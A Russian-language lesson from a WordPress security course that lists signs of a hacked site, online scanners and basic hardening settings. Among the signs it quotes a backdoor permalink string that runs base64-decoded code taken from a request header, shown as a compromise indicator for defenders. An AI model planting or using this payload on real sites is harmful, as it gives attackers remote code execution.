Проверка безопасности. Предварительные настройки

Здравствуйте! Спасибо за интерес и Добро пожаловать на мой курс Безопасный Вордпресс за 2 вечера.

В этом курсе вы настроите мощную автоматическую защиту сайта уровня премиум-плагинов.
Перед тем, как вы начнете настраивать защиту, прочитайте и примените все, что написано в этом уроке.

Содержание:

Проверка безопасности

Первое, что нужно сделать — проверьте сайт, может быть он уже взломан:

  1. Признаки взломанного сайта
  2. Проверьте сайт он-лайн сервисами

Признаки взломанного сайта

1. Постоянные ссылки. Зайдите в НастройкиПостоянные ссылки. Проверьте, что ничего не добавлено к постоянной ссылке. Постоянная ссылка должна выглядеть как %postname%. Если ссылка изменилась на %postname%/%, например,

%postname%/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/

значит, ваш сайт взломали.

2. Непонятный контент: Контент, который вы не размещали, — рекламные баннеры, новые статьи или страницы, и тому подобное. Проверьте все страницы сайта, начиная с Главной.

3. Поисковики: Проверьте свой сайт в поисках, нет ли в выдаче «виагры» вместе с вашим сайтом.

site:ваш-сайт.ru

Замените ваш-сайт.ru на ваш адрес.

Вставьте эту строку в поисковик, посмотрите, как поисковики видят ваш сайт. Некоторые взломы меняют заголовок страниц на рекламный мусор.

4. Неожиданные пики посещаемости: Хакеры используют взломанные сайты для редиректа на свои сайты. Если вы видите внезапное необъяснимое увеличение посещаемости, это может говорить о перенаправлении спам-трафика через ваш сайт на сайты хакеров.

5. Пользователи сайта: Проверьте пользователей сайта, нет ли неизвестных вам юзеров с правами администратора.

6. Файл .htaccess. Страницы сайта ведут на сайт с Виагрой, казино и тому подобное. Зайдите в свой файл .htaccess, проверьте, не добавились ли новые 301 редиректы. В новой установке Вордпресс файл должен выглядеть так:

7. Редиректы: Вредоносные редиректы с главной или другой / других страниц сайта. Вредоносный код мог быть добавлен в файл wp-config.php:

define(‘WP_HOME’, ‘сторонний URL);

или

define(‘WP_SITEURL’, ‘сторонний URL’);

8. Странные таблицы в базе данных: Хакеры могут получить доступ к базе данных и создать новую таблицу с вредоносным кодом, которая может быть похожа на стандартную таблицу Вордпресс. Например, создать новую таблицу wp_pagemeta, которая маскируется под стандартную таблицу wp_postmeta.

Проверьте сайт он-лайн сервисами

Еще один способ, которым вы можете найти взлом на сайте — просканировать сайт он-лайн сервисами.

  • Unmask Parasites — проверяет, был ли сайт взломан и есть ли на сайте вредоносный код или спам.
  • WordPress Security Scan — проверяет основные уязвимости Вордпресс сайтов. Более глубокий анализ доступен по платной подписке.
  • Sucuri SiteCheck – проверяет сайт на наличие вредоносного софта, внесение сайта в черные списки (на данный момент 9 списков), ошибок и устаревшего ПО.
  • Scan My Server – сервис предоставляет детальный отчет об уязвимостях сайта и еженедельное сканирование на бесплатном тарифе. Для работы требуется бесплатная регистрация и размещение картинки с обратной ссылкой на сервис в футере сайта.
  • Norton Safe Web – сканер сайта от Norton, проверяет сайт на наличие вредоносного ПО.
  • Web Inspector – еще один хороший сервис, проверяет сайт на наличие червей, троянов, бэкдоров, вирусов, фишинга, вредоносного и подозрительного ПО и так далее. В течение нескольких минут генерирует довольно детальный отчет.
  • VirusTotal – крутейший сервис для сканирования сайтов, использует более 50 разных сканеров — Касперского, Dr.Web, ESET, Yandex Safebrowsing и других. Можно просканировать сайт, IP адрес или файл.
  • Acunetix — сканирует Вордпресс и не только Вордпресс сайты, нужна регистрация для 14-дневного бесплатного trial-периода.

Еще одна вещь, которую вы можете сделать — скачайте сайт на компьютер и проверьте его антивирусом.

Предварительные настройки

После того, как вы проверили сайт, можно начинать настраивать его защиту. В этом разделе — обязательные настройки «здравого смысла», которые должны быть сделаны на любом сайте.

1. Обновите софт до последней версии

Новые версии Вордпресс выходят регулярно и содержат обновления безопасности, исправления багов и новые функции. Разработчики постоянно следят за появлением новых угроз и оперативно выпускают обновления безопасности.

Если вы пропускаете обновление, на вашем сайте не будет последних исправлений безопасности, то есть сайт будет содержать софт с известной уязвимостью, описание которой находится в открытом доступе. Это первый по популярности способ взлома сайта.

Хакбот придет на сайт и запросит версию ПО. Если в его базе данных найдется уязвимость этой версии ПО, он его взломает по уже известной методике.

Делайте ручное обновление Вордпресс, темы и плагинов в разделе Консоль — Обновления.

Или настройте автоматическое обновление софта:

2. Используйте сложные логины и пароли

Если вы используете стандартный логин, например, Admin, Administrator или имя вашего домена, и простые пароли (10.000 самых популярных паролей), то хакеры очень быстро взломают ваш сайт. Подбор стандартных логина и пароля — второй по популярности способ взлома сайта.

После взлома хакер зайдет на сайт, создаст новый аккаунт администратора, будет публиковать контент, ссылки на другие сайты, начнет рассылку спама, и так далее. Он может удалить аккаунт старого администратора.

Придумайте пароль минимум из 12 символов, состоящий из строчных и заглавных букв, цифр и символов.

Генератор паролей в Вордпресс: Пользователи — Ваш профиль — Управление учетной записью

Генератор паролей Вордпресс

Пароль можно хранить в браузере, или пользоваться сервисом хранения паролей, например, LastPass.

Или вы можете создать свой пароль на основе какой-нибудь фразы, например, «Меня зовут Сергей Петров, у меня есть собака породы Пудель, который родился в 2016.»: MzSP,umespP,krv2016.

Также используйте сложные логины и пароли для аккаунтов, базы данных, е-мейла и хостинга, потому что это альтернативные способы зайти на сайт.

Еще одна вещь, которую вы можете сделать — проверить, что имя пользователя и логин разные. Зайдите в ПользователиВаш профиль.

Имя пользователя Вордпресс
Измените Отображаемое имя

Если имя пользователя и логин одинаковые, то хакер уже знает половину информации, чтобы зайти на сайт. Выберите другое имя в выпадающем списке Отображать как и нажмите Обновить информацию.

Вместо Very-strong-username у вас должен быть ваш уникальный сложный логин.

3. Используйте только проверенный софт

Перед добавлением в репозитарий темы и плагины проверяет команда добровольцев. Они могут пропустить не очень хороший код, который может замедлять сайт или вызывать проблемы с безопасностью.

Каталог тем Вордпресс

Даже если тема или плагин были одобрены как «Без серьезных нарушений», это не значит, что это хороший софт.

Одобренная тема или плагин может содержать уязвимость в безопасности, которую не нашел разработчик, через которую хакер может попасть на плагин, а затем на сайт.

Возможен и обратный вариант: например, пользователь оставил отзыв с одной звездой, потому что в плагине не было какой-то функции, хотя в описании к плагину подробно написано, какие функции в нем есть.

Поэтому оценка ниже 5 звезд не обязательно означает плохой софт.

Используйте регулярно обновляемые темы и плагины от известных разработчиков, с большим количеством отзывов и большим количеством установок. Для плагинов минимум 1.000, еще лучше 10.000 установок.

Удалите все неиспользуемые темы и плагины. Большое количество кода повышает вероятность найти в нем уязвимость.

4. Установите плагин защиты от спама

Спам — это не только надоедливый мусор, но и источник заразы. Установите плагин Kama Spamblock, это эффективное средство для защиты от спама. Плагин настраивать не нужно, просто установите и активируйте.

5. Отключите галочку Любой может зарегистрироваться

Проверьте чекбокс «Любой может зарегистрироваться» в разделе Настройки ОбщиеЧленство

Галочка "Любой может зарегистрироваться"

6. Используйте надежный хостинг

Ненадежный хостинг хакер может взломать и добраться до вашего сайта. Используйте надежные хостинги из Топа хостингов: Hosting-ninja.ru, Hostdb.ru.

Я использую хостинг Beget. Обзор хостинга.

7. Используйте SSL

Безопасное соединение защищает данные, передаваемые посетителями сайта через Интернет. Установите бесплатный или платный сертификат, перед адресом сайта появится зеленый замóк и протокол передачи данных изменится с http на https.

На сайте установлен SSL сертификат
Сайт с установленным SSL сертификатом в браузере Мозилла

Если у вас на сайте есть регистрация / авторизация пользователей или прием оплаты, то есть передача персональных данных, то вам необходимо установить SSL сертификат.

С 1 января 2017 года установленный SSL сертификат стал одним из факторов ранжирования сайтов Гугл.

На большинстве хостингов можно установить бесплатный SSL сертификат за пару кликов.

Если у вас появились сложности с установкой, читайте здесь, или поговорите с техподдержкой хостинга.

8. Проверьте версию PHP

Проверьте на хостинге, какая версия PHP (и MySQL) используется.

На данный момент Вордпресс рекомендует использовать PHP версии 7.3, MySQL версии 5.6.
Версии PHP и MySQL ниже 5.6 больше не поддерживаются, то есть небезопасны.

На всех хостингах это делается по-разному, на Бегет это делается выбором в выпадающем меню.

9. Проверьте Здоровье сайта

Зайдите на страницу ИнструментыЗдоровье сайта.

Здоровье сайта Вордпресс
Вордпресс — Здоровье сайта

Сделайте все улучшения с пометкой Безопасность.

Дополнительные настройки

Вы можете сделать еще несколько настроек: настроить бэкап и подключить сайт к CDN.

Настройте бэкап

Бэкап — важная часть безопасности любого сайта. Если что-то пойдет не так или сайт взломают, у вас всегда будет копия для восстановления.

Подключите сайт к CDN

CDN — это сеть доставки контента. Суть этого сервиса в том, что ваш сайт копируется на несколько серверов в географически разных точках. Когда посетитель запрашивает какую-то страницу сайта, он ее получает не с вашего хостинга, а из ближайшего сервера CDN. Это увеличивает скорость загрузки сайта.

Хотя CDN скорее относится к производительности сайта, у CDN CloudFlare есть несколько настроек безопасности, которые будут полезными на вашем сайте.

Если вы хотите перейти к следующим урокам, нажимайте кнопку:

Оставьте комментарий

Do NOT follow this link or you will be banned from the site!